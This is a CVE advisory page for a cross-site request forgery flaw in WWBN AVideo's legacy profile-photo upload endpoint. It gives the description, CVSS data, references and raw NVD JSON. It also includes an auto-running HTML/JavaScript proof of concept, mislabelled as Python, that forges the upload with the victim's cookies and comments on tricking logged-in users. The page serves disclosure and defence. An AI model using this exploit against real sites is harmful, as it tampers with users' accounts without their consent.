CVE-2026-43877

Description

WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/userSavePhoto.php is a legacy profile-photo endpoint that accepts a base64 POST parameter and writes the decoded bytes to videos/userPhoto/photo<users_id>.png. Its only access control is User::isLogged(). It does not end in .json.php, so it is excluded from the project's global autoCSRFGuard (which is suffix-scoped in objects/include_config.php). There is no CSRF token, no Origin/Referer check, and no MIME validation of the decoded bytes. Because AVideo's default cookie policy is SameSite=None; Secure on HTTPS (objects/functionsPHP.php:227), an attacker who lures a logged-in user to a malicious page can overwrite that user's profile photo with arbitrary bytes and also triggers a site-wide clearCache(true) on every forged request. Commit 9c38468041505e637101c5943c5370c68f48e3ac contains an updated fix.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WWBN AVideo <= 29.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for CVE-2026-43877 -->
<!-- This HTML demonstrates the CSRF vulnerability. -->
<!-- Host this on a different domain and trick a logged-in user to visit it. -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC</title>
</head>
<body>
    <h1>AVideo CSRF Exploit</h1>
    <p>If you are logged into AVideo, your profile photo will be overwritten.</p>
    <script>
        function exploit() {
            // Base64 string representing a 1x1 red pixel PNG
            // This can be replaced with arbitrary bytes, potentially malicious scripts if the context allows
            var payload = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk+M9QDwADhgGAWjR9awAAAABJRU5ErkJggg==";
            
            var formData = new FormData();
            formData.append('base64', payload);

            fetch('http://target-avideo-site/objects/userSavePhoto.php', {
                method: 'POST',
                body: formData,
                credentials: 'include', // Ensures cookies are sent with the request
                mode: 'cors'
            })
            .then(response => response.text())
            .then(data => console.log('Response:', data))
            .catch(error => console.error('Error:', error));
        }

        // Execute automatically on page load
        window.onload = exploit;
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43877
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43877
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43877/
[4] VulDB https://vuldb.com/cve/CVE-2026-43877
[5] https://github.com/WWBN/AVideo/commit/9c38468041505e637101c5943c5370c68f48e3ac
[6] https://github.com/WWBN/AVideo/security/advisories/GHSA-jw8g-5j46-44rp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43877", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:12.113", "lastModified": "2026-05-11T22:22:12.113", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/userSavePhoto.php is a legacy profile-photo endpoint that accepts a base64 POST parameter and writes the decoded bytes to videos/userPhoto/photo<users_id>.png. Its only access control is User::isLogged(). It does not end in .json.php, so it is excluded from the project's global autoCSRFGuard (which is suffix-scoped in objects/include_config.php). There is no CSRF token, no Origin/Referer check, and no MIME validation of the decoded bytes. Because AVideo's default cookie policy is SameSite=None; Secure on HTTPS (objects/functionsPHP.php:227), an attacker who lures a logged-in user to a malicious page can overwrite that user's profile photo with arbitrary bytes and also triggers a site-wide clearCache(true) on every forged request. Commit 9c38468041505e637101c5943c5370c68f48e3ac contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/9c38468041505e637101c5943c5370c68f48e3ac", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-jw8g-5j46-44rp", "source": "[email protected]"}]}}